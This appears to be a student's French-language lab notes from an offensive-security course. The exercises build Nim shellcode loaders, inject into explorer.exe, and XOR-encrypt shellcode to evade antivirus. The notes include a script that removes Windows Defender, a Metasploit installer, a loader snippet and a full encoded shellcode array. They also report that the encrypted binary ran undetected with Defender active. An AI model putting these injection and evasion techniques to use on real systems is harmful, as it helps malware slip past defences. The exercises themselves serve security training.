Exercice 1
----------

1. Comprendre en quoi consiste les slides

2. Qu'est-ce que Nim et comment cela fonctionne?

Faire de petits tests de code avant de commencer.

3. Que fait le premier exercice et commencer à décortiquer le code (heureusement pas trop grand)

4. Comment désactiver totalement defender car sinon erreur sur msfvenom
Methode 1: Disable temporairement --> fonctionne pas
Methode 2: Disable via Group Policy Editor (Pro/Enterprise)  fonctionne pas
Methode 3: Essayer sur une kali --> top fonctionnel mais ce n'est pas l'exercice

Methode 4: Tout désinstaller avec un script (ok)
https://github.com/ionuttbara/windows-defender-remover

!!! mettre le directory en exclusion dans defender sinon ne démarrera pas!!!

git clone https://github.com/ionuttbara/windows-defender-remover.git
cd windows-defender-remover
Script_Run.bat

------ Defender Remover Script , version 12.8.4 ------
Select an option:

Do you want to remove Windows Defender and alongside components? After this you'll need to reboot.
If you PC have a Microsoft Pluton Chip, you can disable from BIOS anytime. (This script removes the integration of Pluton Chip Support and Processing from Windows.)
After confirmation of Removal, your Device will RESTART!!
A backup and/or System Restore point is recommended.
[Y] Remove Windows Defender Antivirus + Disable All Security Mitigations
[A] Remove Windows Defender only, but keep UAC Enabled
[S] Disable All Security Mitigations
 Choisir A

5.Install Metasploit via powershell

https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html


Param(
    $DownloadURL = "https://windows.metasploit.com/metasploitframework-latest.msi",
    $DownloadLocation = "$env:APPDATA/Metasploit",
    $InstallLocation = "C:\Tools",
    $LogLocation = "$DownloadLocation/install.log"
)

If(! (Test-Path $DownloadLocation) ){
    New-Item -Path $DownloadLocation -ItemType Directory
}

If(! (Test-Path $InstallLocation) ){
    New-Item -Path $InstallLocation -ItemType Directory
}

$Installer = "$DownloadLocation/metasploit.msi"

Invoke-WebRequest -UseBasicParsing -Uri $DownloadURL -OutFile $Installer

& $Installer /q /log $LogLocation INSTALLLOCATION="$InstallLocation"


6. Revenir à l'exercice et continuer le décorticage et annotation + modification du payload (ici démarre un checkdisk)

7. Si la session n'a pas assez de privilèges --> erreur avec un programme qui a besoin de droits (checkdisk)

C:\work\tests>BasicShellcodeLoader_DV.exe

C:\work\tests>Access Denied as you do not have sufficient privileges or
the disk may be locked by another process.
You have to invoke this utility running in elevated mode
and make sure the disk is unlocked.

8. Test depuis la machine avec defender actif: il supprime le .exe

9. Conclusion: Intéressant car apercu d'un monde inconnu pour moi

Bonus 1
-------

Idem exercice 1 mais

    # Nim a des types de pointeurs comme ptr[T] et l’adresse d’une variable peut être obtenue avec addr.
    # Le cast en Nim est fait avec la fonction castNewType. C’est un cast non sécurisé car il peut y avoir un débordement de mémoire
   
    let f = cast[proc(){.nimcall.}](executable_memory)
    f()

Exercice 2
-----------

La lecture du code est évidemment plus simple car le code est quasiment identique à l'exercice 1

Tout s'exécute correctement

Le PID est fixe et doit donc être modifié à chaque redémarrage de l'explorer + recompilation du programme

Le payload choisi (ici "User Account Control Settings" et bien démarré mais avec un process id à part

Quel est l’intérêt d’ouvrir un process existant si un nouveau est créé ensuite ?

Bonus 2
-------

Evolution de l'exercice 2 avec recherche du process ID de l'exécutable passé en argument
Pas de remarque particulière sauf que heureusement il y a la solution ;-)

Exercice 3
----------

Idem que l'exercice 2 mais avec encryption du shellcode. Là ça devient intéressant...
J'ai choisi charmap.exe comme payload car il ne demande pas d'élévation de droits.

2 programmes. Le premier Encrypt_DV.exe sert à encrypter le shellcode. Le shellcode démarrera charmap.exe une fois injecté

C:\work\exercice3>Encrypt_DV.exe
const shellcode: array[299,byte] = [
byte 0xae, 0x1a, 0xd1, 0xb6, 0xa2, 0xba, 0x92, 0x52, 0x52, 0x52, 0x13, 0x03, 0x13, 0x02, 0x00,
0x03, 0x04, 0x1a, 0x63, 0x80, 0x37, 0x1a, 0xd9, 0x00, 0x32, 0x1a, 0xd9, 0x00, 0x4a, 0x1a,
0xd9, 0x00, 0x72, 0x1a, 0xd9, 0x20, 0x02, 0x1a, 0x5d, 0xe5, 0x18, 0x18, 0x1f, 0x63, 0x9b,
0x1a, 0x63, 0x92, 0xfe, 0x6e, 0x33, 0x2e, 0x50, 0x7e, 0x72, 0x13, 0x93, 0x9b, 0x5f, 0x13,
0x53, 0x93, 0xb0, 0xbf, 0x00, 0x13, 0x03, 0x1a, 0xd9, 0x00, 0x72, 0xd9, 0x10, 0x6e, 0x1a,
0x53, 0x82, 0xd9, 0xd2, 0xda, 0x52, 0x52, 0x52, 0x1a, 0xd7, 0x92, 0x26, 0x35, 0x1a, 0x53,
0x82, 0x02, 0xd9, 0x1a, 0x4a, 0x16, 0xd9, 0x12, 0x72, 0x1b, 0x53, 0x82, 0xb1, 0x04, 0x1a,
0xad, 0x9b, 0x13, 0xd9, 0x66, 0xda, 0x1a, 0x53, 0x84, 0x1f, 0x63, 0x9b, 0x1a, 0x63, 0x92,
0xfe, 0x13, 0x93, 0x9b, 0x5f, 0x13, 0x53, 0x93, 0x6a, 0xb2, 0x27, 0xa3, 0x1e, 0x51, 0x1e,
0x76, 0x5a, 0x17, 0x6b, 0x83, 0x27, 0x8a, 0x0a, 0x16, 0xd9, 0x12, 0x76, 0x1b, 0x53, 0x82,
0x34, 0x13, 0xd9, 0x5e, 0x1a, 0x16, 0xd9, 0x12, 0x4e, 0x1b, 0x53, 0x82, 0x13, 0xd9, 0x56,
0xda, 0x1a, 0x53, 0x82, 0x13, 0x0a, 0x13, 0x0a, 0x0c, 0x0b, 0x08, 0x13, 0x0a, 0x13, 0x0b,
0x13, 0x08, 0x1a, 0xd1, 0xbe, 0x72, 0x13, 0x00, 0xad, 0xb2, 0x0a, 0x13, 0x0b, 0x08, 0x1a,
0xd9, 0x40, 0xbb, 0x05, 0xad, 0xad, 0xad, 0x0f, 0x1a, 0xe8, 0x53, 0x52, 0x52, 0x52, 0x52,
0x52, 0x52, 0x52, 0x1a, 0xdf, 0xdf, 0x53, 0x53, 0x52, 0x52, 0x13, 0xe8, 0x63, 0xd9, 0x3d,
0xd5, 0xad, 0x87, 0xe9, 0xb2, 0x4f, 0x78, 0x58, 0x13, 0xe8, 0xf4, 0xc7, 0xef, 0xcf, 0xad,
0x87, 0x1a, 0xd1, 0x96, 0x7a, 0x6e, 0x54, 0x2e, 0x58, 0xd2, 0xa9, 0xb2, 0x27, 0x57, 0xe9,
0x15, 0x41, 0x20, 0x3d, 0x38, 0x52, 0x0b, 0x13, 0xdb, 0x88, 0xad, 0x87, 0x11, 0x68, 0x0e,
0x25, 0x3b, 0x3c, 0x36, 0x3d, 0x25, 0x21, 0x0e, 0x21, 0x2b, 0x21, 0x26, 0x37, 0x3f, 0x61,
0x60, 0x0e, 0x31, 0x3a, 0x33, 0x20, 0x3f, 0x33, 0x22, 0x7c, 0x37, 0x2a, 0x37, 0x52 ]


Et le deuxième, BasicAVevasion.exe , utilise la même clé (0x52) pour décrypter le tableau avant de l'injecter dans le process distant comme dans l'exercice 2 
Il s'exécute en utilisant le process ID fixe distant de l'explorer

Bonus 3: Tester l'exe contre AV
----------------------------------------
J'ai repris l'exercice 3 (exercice 4 inconnu) pour que l'exe demande un executable et trouve le process ID dynamiquement. Un mix entre l'exercice 2 et le 3.
L'exe a été testé sur la deuxième vm sur laquelle tourne defender.

L'exe contenant le shellcode encrypté n'est pas supprimé par Defender lors de la copie de fichier.

Analyse rapide de defender exécutée --> no new thread found et l'exe est toujours là

Le malware avec shellcode encrypté s'exécute donc sans soucis avec Defender actif.







